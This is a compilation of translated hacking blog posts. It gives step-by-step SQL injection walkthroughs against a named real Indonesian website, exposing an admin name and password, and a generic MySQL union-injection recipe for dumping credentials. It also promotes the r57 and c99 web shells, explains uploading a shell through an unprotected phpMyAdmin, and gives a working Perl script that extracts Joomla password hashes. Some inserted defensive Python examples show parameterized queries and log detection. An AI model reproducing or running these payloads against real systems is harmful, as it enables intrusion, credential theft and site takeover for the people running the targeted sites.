MS SQL Injection, step by step

Have you often heard the term "SQL Injection" lately?
Do you know how dangerous this bug is?
We will present SQL Injection step by step.
Note: we restrict the discussion to SQL Injection in MS SQL Server.
We take the site www.pln-wilkaltim.co.id as the example.
There are two weaknesses in this site, namely:
1. The News table
2. The Admin table

The first step is to determine which holes can be injected, by enumerating (walking through) the inputs the site uses.
We will find two kinds of input parameters: input entered through a form box, and input passed through the URL address.

We take the easiest first: the input box. We look for the admin login box and find it at www.pln-wilkaltim.co.id/sipm/admin/admin.asp. The first step is to determine the table name and its fields, so we inject the NIP box with the command below (the password can be anything):
' having 1=1--
Do not forget to write the single quote and the double hyphen (important). For what these two characters mean, see the SQL Injection tutorial at www.neoteker.or.id. The following error message will then come out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Our first field name comes out.
Note the table name: T_ADMIN
Note the field name: NOMOR

Next we find the next field name (the table name may turn out to be different).
We inject the NIP box with (the password can be anything):
' group by T_ADMIN.NOMOR having 1=1--
The error message that comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
This gives us the table name and our second field.
Record: T_ADMIN.NIP

Then we find our third field:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
The error message that comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Record the third field: T_ADMIN.PASSWORD

Repeat the steps above until we find the last field.
Here is the message that appears when we check for the last field by injecting:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(note: the command must be on one line, not broken across lines)
--------------------
- nip or password or you have the wrong units !! -
--------------------
We have successfully found the last field.
List of columns (fields):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL

There is only one table for this authentication (T_ADMIN),
which makes our process easier.

The next step is to determine the data types of the fields listed above.

We inject in the box (the password can be anything):
' union select sum(NOMOR) from T_ADMIN--

The meaning of this query: we apply the sum() aggregate before checking whether the two rowsets of the UNION have the same number of columns.
Put simply, sum() only applies to numeric column types, so on a non-numeric column an error comes out that tells us the type of that column.
Error message:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
This means the NOMOR column type is numeric (the only complaint is about the UNION column count, not about sum()).
Next we inject:
' union select sum(NIP) from T_ADMIN--
The error message that comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
This means the NIP column type is char.

We repeat the command above for each remaining column, replacing nama_kolom in:
' union select sum(nama_kolom) from T_ADMIN--
with the next column name. We get the column types:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

The next step: we search for the contents of the password field of the admin user, by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
This means we choose the minimum user name greater than 'a' and try to convert it to integer type. The number 1 repeated six times means that we select only the NAMA column and fill the other six columns with placeholders.
The error message that comes out:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Look at:
varchar value 'bill '
'bill' is the user name, i.e. the NAMA column, of the last record entered.

Next, we inject:
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'--
(note: on one line)
The error message that comes out:
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
This means we have succeeded.
We get:
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Please log in at:
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the account above; the branch field you will have to fill in yourself by trial and error.

Or we just use the shortcut.

We inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
(note: on one line)

This takes us directly to the admin menu.
Remember: do not make mischief! Report it to the admin!


The second hole is in the news. The news content basically comes from another table.
So we can still inject! The difference is that we must enter the parameters through the URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
There are the parameters id and idSM.
When we try to inject, the parameter that has an effect is id.

We inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
The error message that comes out:
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
This means 'tb_news.NewsId' is our first table and column.
We repeat the steps above to get:
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, the rest is your own work, to develop your knowledge.
From here you can work out the contents yourself.
This is why holes in MS SQL Server are very dangerous.

=========================================
Specially for ADMIN & WEB PROGRAMMER !!!
=========================================
Common prevention strategies:
1. Limit the length of the input box (if possible) in the source code, so that a beginner cracker is confused for a moment when the input box cannot be injected with a long command.
2. Filter the input entered by the user, especially single quotes (input validation).
3. Turn off or hide the error messages from the running SQL Server.
4. Turn off standard facilities such as stored procedures and extended stored procedures, if possible.
5. Change "Startup and run SQL Server" to a low-privilege user in the SQL Server Security tab.
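Points 2 and 3 are where the login form in this post failed, so here is an added Python example (mine, not code from the post) showing the difference. It uses an in-memory SQLite table with the post's T_ADMIN column names and one constructed row in place of MS SQL Server, which means the type-conversion errors the post relied on do not occur; what it shows is that a login built by string concatenation treats the post's own NIP-box payloads as SQL (the sum() probe surfaces a raw database error, and the union select min(NAMA) payload makes the injected row count as a successful login), while a parameterized query with a fixed error message treats the same input as a plain string that matches nothing. The function names and the sample row are assumptions of the example.

```python
import sqlite3


def make_db():
    """Stand-in for the post's T_ADMIN table: the column names are the ones the
    post enumerated; the single row is constructed for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE T_ADMIN (NOMOR INTEGER, NIP TEXT, PASSWORD TEXT, NAMA TEXT,"
        " KD_RANTING TEXT, ADDRESS TEXT, EMAIL TEXT)"
    )
    # Plain-text password only because the post's table stored one; a real
    # application stores a password hash here.
    conn.execute(
        "INSERT INTO T_ADMIN VALUES (1, '1001', 'example-pass', 'bill', '01',"
        " 'n/a', 'bill@example.invalid')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn, nip, password):
    """String concatenation: the NIP value becomes part of the SQL text, and any
    database error is passed straight back to the caller (the pattern the post's
    dologin.asp error messages show)."""
    sql = ("SELECT * FROM T_ADMIN WHERE NIP='" + nip
           + "' AND PASSWORD='" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
        return {"ok": row is not None, "error": None}
    except sqlite3.Error as exc:
        return {"ok": False, "error": str(exc)}  # raw DB error leaks out


def login_safe(conn, nip, password):
    """Parameterized query: the driver sends the values separately from the SQL,
    so a quote, '--' or UNION inside them is only data. Any database error is
    replaced by a fixed message that says nothing about the schema."""
    sql = "SELECT * FROM T_ADMIN WHERE NIP=? AND PASSWORD=?"
    try:
        row = conn.execute(sql, (nip, password)).fetchone()
        return {"ok": row is not None, "error": None}
    except sqlite3.Error:
        return {"ok": False, "error": "login failed"}


if __name__ == "__main__":
    db = make_db()
    # Payloads quoted from the post, given as the NIP box value.
    probe = "' union select sum(NOMOR) from T_ADMIN--"
    extract = "' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--"
    for name, fn in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        print(name, "probe:  ", fn(db, probe, "x"))
        print(name, "extract:", fn(db, extract, "x"))
```

Run it and the vulnerable handler returns an error string for the sum() probe and ok=True for the min(NAMA) payload even though the password given is wrong; the safe handler returns ok=False with no error for both, because neither string is a real NIP.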

Well, that is about all I can tell.
This is a picture of how insecure the Internet is...
If you want to be more secure, unplug your network cable, remove your disk drives, pull out your hard drive, and sell your computer!
Just kidding :)

References:
[+] SQL injection, www.BlackAngels.it
[+] Advanced SQL Injection in SQL Server Applications (www.ngssoftware.com)
[+] SQL Injection Walkthrough (www.securiteam.com)


My SQL Injection Step by Step

SQL injection is a hacking action performed from the client application by modifying the SQL command that already exists in the memory of the client application; it is a technique that exploits web applications that use a database for data storage.

What you need to know before a MySQL SQL injection:
characters: ' or -
comments: /* or --
information_schema by version: MySQL version 5.x; not supported in MySQL version 4.x

===========
=First step:=
===========

Find a target.
Example: [site]/berita.php?id=100

Add the character ' at the end of the URL, or the character "-" in front of the id, to see whether an error message appears.
Example: [site]/berita.php?id=100' or
[site]/berita.php?id=-100

An error message then appears.

==========
=Second step:=
==========

Find and count the number of columns the page's query uses...
Use the command: order by

Example: [site]/berita.php?id=-100+order+by+1-- or
[site]/berita.php?id=-100+order+by+1/*

Check one by one...
Example: [site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

until an error appears or the page content goes missing...
Example: [site]/berita.php?id=-100+order+by+9--

This means the number we take is 8, so:
[site]/berita.php?id=-100+order+by+8--

===========
=Third step:=
===========

To find out which number shows up on the page, use the union command.
Because the error appeared at number 9:
[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Suppose the number that shows up is 5.

Use the command version() or @@version to check the SQL version in use; put the command in place of the number that showed up.
Example: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- or
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

Look at the version that is shown. If it is version 4, then for this version we have to guess the table and column names ourselves, because we cannot use FROM information_schema.

For version 5 you are lucky: you do not have to guess the table and column names as with version 4, because in version 5 we can use FROM information_schema.

============
=Fourth step:=
============

To display the tables on the web:
command: table_name >>> goes in the position of the number that showed up
command: +from+information_schema.tables/* >>> goes after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

Example: the table that appears is "admin".

===========
=Fifth step:=
===========

To display all the table names at once, the command is
command: group_concat(table_name) >>> goes in the position of the number that showed up
command: +from+information_schema.tables+where+table_schema=database() >>> goes after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= Sixth step: =
=============

command: group_concat(column_name) >>> goes in the position of the number that showed up
command: +from+information_schema.columns+where+table_name=0xhexa-- >>> goes after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--

At this stage you must convert the table name to hexadecimal; the website used for the conversion is:

www.ascii-convert.co.cc

For example, the word admin after conversion becomes 61646D696E.

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--

============
=Seventh step:=
============

To extract the contents found earlier from the table, the way is:

command: concat_ws(0x3a,the columns whose contents you want to extract) >>> goes in the position of the number that showed up
command: +from+(the table they come from) >>> goes after the last number

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,column_contents),6,7,8+from+(source_table)--

For example, the columns that came out were id,username,password:

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= Eighth step:=
==============

Last step: find the admin page or login page.

Then it is up to you, because the power over the web is in your hands.
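The URL payloads in the steps above are exactly what a web server's access log records, so here is an added Python example (not part of the original post) that URL-decodes the request path of each access-log line and flags the patterns used in these steps: order by probes, union select, information_schema, group_concat, 0x hex literals, version probes and a trailing comment. The log lines are constructed for the example in Apache combined format, and the signature names and the per-IP grouping are my own choices, not any existing tool's.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the URL payloads quoted in the steps above. They are
# applied to the URL-decoded path, so "+" and %XX encoding cannot hide them.
SIGNATURES = {
    "order-by-probe":     re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select":       re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.\w+", re.I),
    "group_concat":       re.compile(r"\bgroup_concat\s*\(", re.I),
    "hex-literal":        re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "version-probe":      re.compile(r"\bversion\(\)|@@version", re.I),
    "comment-terminator": re.compile(r"(?:--|/\*)\s*$"),
}

# Apache "combined" access-log format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one client walking the steps above, one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jun/2009:10:24:01 +0700] "GET /berita.php?id=100 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Jun/2009:10:24:03 +0700] "GET /berita.php?id=-100+order+by+9-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Jun/2009:10:24:07 +0700] "GET /berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables-- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Jun/2009:10:24:09 +0700] "GET /berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E-- HTTP/1.1" 200 4901 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jun/2009:10:25:00 +0700] "GET /berita.php?id=101 HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
"""


def classify(line):
    """Parse one access-log line; return None if it is not in combined format,
    otherwise a dict with the decoded path and the signature names it matched."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "path": decoded, "hits": hits}


def scan(log_text, min_hits=1):
    """Group flagged requests by client IP, so a step-by-step enumeration like
    the one above (order by, then union select, then information_schema) shows
    up as a sequence from one source rather than as isolated events."""
    report = {}
    for line in log_text.splitlines():
        rec = classify(line)
        if rec is None or len(rec["hits"]) < min_hits:
            continue
        entry = report.setdefault(rec["ip"], {"requests": 0, "signatures": set(), "paths": []})
        entry["requests"] += 1
        entry["signatures"].update(rec["hits"])
        entry["paths"].append(rec["path"])
    return report


if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info["requests"], "flagged requests:", ", ".join(sorted(info["signatures"])))
```

Decoding before matching matters: the literal log text contains "+order+by+9", and a signature written against the raw line would miss the same payload sent with %20 instead of "+".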


Various famous shell injection

Maybe some of you do not know what shell injection is. A shell injection is a script that we place on the target server; it is our entrance to taking over the server. With the shell we can see the contents of the database server and what is bound to it, and we can even get an interactive shell to use for rooting. These shells can run on Linux and Windows systems, and we adjust the commands to the target OS.
The following are screenshots of the injection shells (images not included in this text copy):

r57 shell (download link in the original post)

c99shell (download link in the original post)

c100shell (download link in the original post)


My Ubuntu...

This is the latest look of the Ubuntu 8.10 Linux that I use for hacking...
A cooler and scarier look...


My Desktop



My Mozilla



Upload Shell on phpMyAdmin

Greetings all...
For those who already know this trick, I apologize...
There may be some colleagues who do not know it yet...

phpMyAdmin should be protected with a password, but there are still some websites that leave the default (no password), and we can use that...

Here I will show you how to upload a shell on localhost.
We will create a form called form.php and an uploader called upload.php that let us upload a shell...

First we must know the path of the document root.
Picture 1


Then we go into phpMyAdmin to create a database.
Picture 2.


In the picture above we create a database called shell in the "Create new database" text box. After that, select the database called shell, select the SQL tab, and enter the SQL command. The command below creates a table called form and writes a file called form.php into the DOCUMENT ROOT; the file contains the HTML code.
Like Picture 3


If there are no errors, a file called form.php is created in the DOCUMENT ROOT.
Picture 4.


Once we have made the form, we must create the file uploader...
The command below creates a table called upload and writes a file called upload.php into the DOCUMENT ROOT; the file contains the PHP upload code.
Like Picture 5


If there are no errors, a file called upload.php is created in the DOCUMENT ROOT.
Picture 6.


After success, all that is left is to call the form.php file in the DOCUMENT ROOT; for example, http://localhost/form.php
Picture 7.


Then we upload the shell to be placed on the web. For example, I upload a shell, and if it succeeds a blank page appears and the URL points to the file "upload.php"; on my localhost it points to http://localhost/upload.php
Like Picture 8.


This is an example of a successful shell upload to my localhost server..
Picture 9.


The script and shell can be downloaded at
http://www.ziddu.com/download/8112213/upload_shell_on_phpmyadmin.zip.html

I apologize in advance if there are errors.
Please correct me.
Thanks


Hacking sites

There are many sites that provide information on hacking activities in this world. Maybe these are some of them...


http://milw0rm.com/



http://www.securityfocus.com/



http://darkc0de.com/



http://www.darkmindz.com/



http://www.jasakom.com/



http://www.kecoak-elektronik.net/log/


From these sites we will get a lot of information and hacking techniques...
Hopefully helpful...


Joomla Password Encryption

Joomla has implemented a hashing model called md5salt.
An example is faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

The hash is found in the first part, faae726c2d28d65735ba190c5b249e54, and the salt is at the end, G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A; they appear separated by a colon ":".
For the attacker, the salt helps in finding the actual password.
What is found here is that if the password in plain-text form is joined with its salt, it produces the Joomla password hash. In other words: x + salt = Joomla hash. So, implemented through MD5 encryption:

md5(x + salt) = hash
so:
md5(x + G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A) = faae726c2d28d65735ba190c5b249e54
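To make the md5(x + salt) relation concrete, here is an added Python example (mine, not Joomla's code and not from the post) that builds a string in the hash:salt form, splits a stored one back into its parts, and verifies a candidate password the way the formula describes. The password used is constructed; the salt from the post's example is reused only to show the split. Function names are my own.

```python
import hashlib
import hmac
import secrets
import string
from typing import Optional

# Joomla's legacy salts are 32 alphanumeric characters, as in the post's example.
SALT_ALPHABET = string.ascii_letters + string.digits


def make_joomla_hash(password: str, salt: Optional[str] = None) -> str:
    """Produce the 'md5(password + salt):salt' string described above."""
    if salt is None:
        salt = "".join(secrets.choice(SALT_ALPHABET) for _ in range(32))
    digest = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return f"{digest}:{salt}"


def split_joomla_hash(stored: str):
    """Split 'hash:salt'; reject anything that is not 32 hex chars, ':' and a salt."""
    digest, sep, salt = stored.partition(":")
    if (sep != ":" or len(digest) != 32 or not salt
            or not all(c in string.hexdigits for c in digest)):
        raise ValueError("not a Joomla md5salt string")
    return digest.lower(), salt


def verify_joomla_password(password: str, stored: str) -> bool:
    """Recompute md5(x + salt) for the candidate x and compare in constant time."""
    digest, salt = split_joomla_hash(stored)
    candidate = hashlib.md5((password + salt).encode("utf-8")).hexdigest()
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    # The post's example string: the salt is recoverable, the password is not.
    example = "faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A"
    print(split_joomla_hash(example))
    stored = make_joomla_hash("constructed-password")  # random salt
    print(verify_joomla_password("constructed-password", stored),
          verify_joomla_password("other", stored))
```

The salt only defeats precomputed tables and makes two users with the same password hash differently; MD5 itself is fast enough that a dictionary run against a single hash is cheap, which is why Joomla 3.2 and later store passwords with bcrypt via PHP's password_hash instead of this md5salt form.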

To crack it, we use a dictionary tool that can be downloaded at
http://www.ziddu.com/download/8111597/brute.zip.html

Have fun cracking Joomla passwords, and good luck....




Simple SQL Injection Script for Joomla

This is a simple Joomla SQL injection script that can retrieve the md5 password in md5salt form, and we can pick the row of the jos_users table to read...

#!/usr/bin/perl -w
# Script as posted, with these defects fixed: the shebang "#" restored,
# HTTP::Request imported, the injected URL built on one line (the posted
# string literal contained line breaks), the user-agent variable renamed
# from Perl's special $b, and the <user>/<pass> marker tags restored in the
# two regexes (the page's HTML had stripped them; they are the same tags
# that CHAR(60,117,115,101,114,62) = "<user>" and
# CHAR(60,112,97,115,115,62) = "<pass>" insert into the response).
use strict;
use LWP::UserAgent;
use HTTP::Request;

print "\t\t###############################################\n\n";
print "\t\t# Joomla SQL Injection #\n\n";
print "\t\t###############################################\n\n";

# "Contoh" = "Example", "baris_dari_pass" = "row_of_pass"
die "Contoh: perl $0 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' 'baris_dari_pass'\n"
    unless @ARGV == 2;

my $user  = "username";
my $pass  = "password";
my $tabel = "jos_users";

my $ua = LWP::UserAgent->new() or die "Could not initialize browser\n";
$ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

# The query stays on one line; the markers wrap the two values so the regexes
# below can find them in the HTML that comes back.
my $host = $ARGV[0]
    . "+AND+1=2+union+all+select+1,concat(CHAR(60,117,115,101,114,62),"
    . $user . ",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),"
    . $pass . ",CHAR(60,112,97,115,115,62)),3,4,5+from+" . $tabel
    . "+LIMIT+" . $ARGV[1] . ",1--";

my $res    = $ua->request(HTTP::Request->new(GET => $host));
my $answer = $res->content;

if ($answer =~ /<user>(.*?)<user>/) {
    print "\n[+] Username : $1";
}
if ($answer =~ /<pass>(.*?)<pass>/) {
    print "\n[+] password : $1\n\n";
    print "\t\t# berhasil #\n\n";    # "berhasil" = "success"
} else {
    print "\n[-] gagal...\n";        # "gagal" = "failed"
}

What needs to be done is to determine the number of columns and which number appears on the page.
Example:
1. The target is http://joomla_web.com/path/index.php?option=com_contoh&id=1
2. There are 5 columns ===> +AND+1=2+UNION+SELECT+1,2,3,4,5--
3. The number that appears is 2 ===> +AND+1=2+UNION+SELECT+1,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),3,4,5--

Then you can use it:
perl joomla.pl 'http://joomla_web.com/path/index.php?option=com_contoh&id=1' '0'
Notes:
joomla.pl ==> name of the file
'http://joomla_web.com/path/index.php?option=com_contoh&id=1' ==> the vulnerable Joomla site
'0' ==> the first row of the jos_users table; for the second row replace it with '1', and so on

If successful, it will look like this:

###################################################

# Joomla SQL Injection #


###################################################


[+] Username : admin
[+] password : faae726c2d28d65735ba190c5b249e54:G9A9HKtr7Go3xuBZRTUjIz0ufiyOBd8A

# berhasil #

Now all that is left is to crack the md5 salt hash.

Or you can download the script here:
http://www.ziddu.com/download/8111490/joomla.zip.html


Scanning the web with nmap

Nmap is a very powerful tool for finding the ports, services and operating system used by a server.
From nmap's output we can get a lot of information.
Here I'll show you several ways of using nmap; you can combine the existing nmap options according to your creativity..

Here I will try to scan localhost

root@hack-ngelih:/home/hack# nmap Aggressive -A -v -O 127.0.0.1

Starting Nmap 4.85BETA7 ( http://nmap.org ) at 2009-06-13 10:24 WIT
Failed to resolve given hostname/IP: Aggressive. Note that you can't use '/mask' AND '1-4,7,100-' style IP ranges
Initiating SYN Stealth Scan at 10:24
Scanning localhost (127.0.0.1) [1000 ports]
Discovered open port 443/tcp on 127.0.0.1
Discovered open port 3306/tcp on 127.0.0.1
Discovered open port 80/tcp on 127.0.0.1
Discovered open port 21/tcp on 127.0.0.1
Discovered open port 631/tcp on 127.0.0.1
Completed SYN Stealth Scan at 10:24, 0.04s elapsed (1000 total ports)
Initiating Service scan at 10:24
Scanning 5 services on localhost (127.0.0.1)
Completed Service scan at 10:24, 12.22s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against localhost (127.0.0.1)
NSE: Initiating script scanning.
Initiating NSE at 10:24
Completed NSE at 10:24, 5.08s elapsed
Host localhost (127.0.0.1) is up (0.000045s latency).
Interesting ports on localhost (127.0.0.1):
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
80/tcp open http Apache httpd 2.2.11
|_ html-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.11
|_ sslv2: server still supports SSLv2
|_ html-title: Site doesn't have a title (text/html).
631/tcp open ipp CUPS 1.3.7
3306/tcp open mysql MySQL 5.1.30
| mysql-info: Protocol: 10
| Version: 5.1.30
| Thread ID: 12
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_ Salt: ~Bm~R][405X
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.17 - 2.6.27
Uptime guess: 0.149 days (since Sat Jun 13 06:50:30 2009)
Network Distance: 0 hops
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix

Read data files from: /usr/local/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.26 seconds
Raw packets sent: 1019 (45.598KB) | Rcvd: 2046 (87.120KB)
root@hack-ngelih:/home/hack#


From the output above you can see that the open ports are 21, 80, 443, 631 and 3306, that the scan ran in aggressive mode (-A) against host 127.0.0.1, and that the OS in use was identified as Linux 2.6.x. (The stray word "Aggressive" in the command was taken as a hostname and could not be resolved, as the second line of the output shows; -A already selects aggressive mode.)
You can also add -sS to the command above for a TCP SYN scan; the output shows nmap already chose one here ("SYN Stealth Scan").
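A practitioner running this scan would want the port table in a form they can act on, so here is an added Python example (mine, not part of the post or of nmap) that parses the port and NSE script lines from the output above and applies a small review policy to them. The policy rules (SSLv2 enabled, clear-text FTP, a database listener reachable over the network) are my own assumptions about what to flag, not nmap's; the input is copied from the scan output shown above.

```python
import re

# Port table and NSE script lines copied from the scan output in the post.
SCAN_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
80/tcp open http Apache httpd 2.2.11
|_ html-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd 2.2.11
|_ sslv2: server still supports SSLv2
|_ html-title: Site doesn't have a title (text/html).
631/tcp open ipp CUPS 1.3.7
3306/tcp open mysql MySQL 5.1.30
| mysql-info: Protocol: 10
| Version: 5.1.30
|_ Salt: ~Bm~R][405X
Device type: general purpose
"""

# "21/tcp open ftp ProFTPD 1.3.1": port/proto, state, service, optional version.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.+))?$"
)
# NSE output lines start with "|" or "|_" and belong to the port above them.
SCRIPT_LINE = re.compile(r"^\|_?\s*(?P<text>.+)$")


def parse_ports(text):
    """Turn nmap's normal-format port table into a list of dicts."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append({
                "port": int(m.group("port")), "proto": m.group("proto"),
                "state": m.group("state"), "service": m.group("service"),
                "version": m.group("version") or "", "scripts": [],
            })
            continue
        s = SCRIPT_LINE.match(line)
        if s and ports:
            ports[-1]["scripts"].append(s.group("text"))
    return ports


def review(ports):
    """Review policy (an assumption of this example, not an nmap feature):
    the findings a defender reading this scan would act on first."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        if any("supports SSLv2" in t for t in p["scripts"]):
            findings.append({"port": p["port"],
                             "issue": "SSLv2 still enabled; disable it in the TLS configuration"})
        if p["service"] == "ftp":
            findings.append({"port": p["port"],
                             "issue": "FTP sends credentials in clear text; prefer SFTP/FTPS or restrict access"})
        if p["service"] in ("mysql", "mssql", "postgresql"):
            findings.append({"port": p["port"],
                             "issue": f"database listener ({p['service']}) reachable over the network; bind to localhost or firewall it"})
    return findings


if __name__ == "__main__":
    parsed = parse_ports(SCAN_OUTPUT)
    for p in parsed:
        print(p["port"], p["service"], p["version"])
    for f in review(parsed):
        print("finding:", f["port"], f["issue"])
```

On the output above this yields three findings (ports 21, 443 and 3306); the version strings it extracts are also what you would check against vendor advisories for ProFTPD 1.3.1, Apache 2.2.11, CUPS 1.3.7 and MySQL 5.1.30.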

Please expand on it...

